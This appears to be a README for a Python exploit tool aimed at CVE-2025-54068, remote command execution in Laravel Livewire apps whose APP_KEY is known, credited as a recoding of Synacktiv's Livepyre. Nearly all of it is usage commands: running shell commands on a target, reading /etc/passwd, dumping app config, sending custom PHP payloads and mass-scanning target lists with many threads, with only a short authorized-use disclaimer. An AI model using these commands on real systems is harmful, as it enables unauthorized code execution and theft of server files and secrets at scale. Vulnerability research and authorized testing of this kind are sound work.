Share
## https://sploitus.com/exploit?id=62F176CD-44EC-5B5B-9BE7-E280209FC035
# CVE-2025-54068

A tool designed to exploit CVE-2025-54068 and Remote Command Execution if the APP_KEY of the Livewire project is known.

This tool is a recoded version of the original project by **Synacktiv**:

* **Livepyre** โ€” [https://github.com/synacktiv/Livepyre](https://github.com/synacktiv/Livepyre)

The core concept and methodology are based on the original implementation.
This version includes minor enhancements and additional features to improve usability and flexibility.

---

## ๐Ÿš€ Basic Usage

Run the tool against a single target:

```bash
python gas.py -u target.com
```

With custom parameters:

```bash
python gas.py -u https://target.com -p "id;uname -a;pwd;ls -la"
```

---

## ๐Ÿ› ๏ธ Custom Function

Execute predefined custom functions:

```bash
python gas.py -u target.com --custom-function "shell:ls -la"
python gas.py -u target.com --custom-function "read:/etc/passwd"
python gas.py -u target.com --custom-function "phpinfo"
python gas.py -u target.com --custom-function "config"
```

Combine multiple functions in one command:

```bash
python gas.py -u target.com --custom-function "shell:whoami && shell:id && read:/etc/passwd"
```

---

## ๐Ÿงฉ Custom PHP File

Use your own PHP payload file:

```bash
python gas.py -u target.com --custom-file custom.php --param "shell:id"
```

---

## ๐Ÿงช Generate Payload Only

Generate payload without sending it to the target:

```bash
python gas.py --generate-payload --custom-function "shell:ls -la"
```

Or using a custom PHP file:

```bash
python gas.py --generate-payload --custom-file custom.php
```

---

## ๐Ÿ“ฆ Mass Check

Scan multiple targets from a file:

```bash
python gas.py --mass-check targets.txt -o results.json
```

With custom thread count:

```bash
python gas.py --mass-check targets.txt -t 20 -o results.json
```

---

## โš ๏ธ Disclaimer

This tool is intended for **educational and authorized security testing purposes only**. Do not use it against systems you do not own or have explicit permission to test.

---

Happy hacking๐Ÿ˜„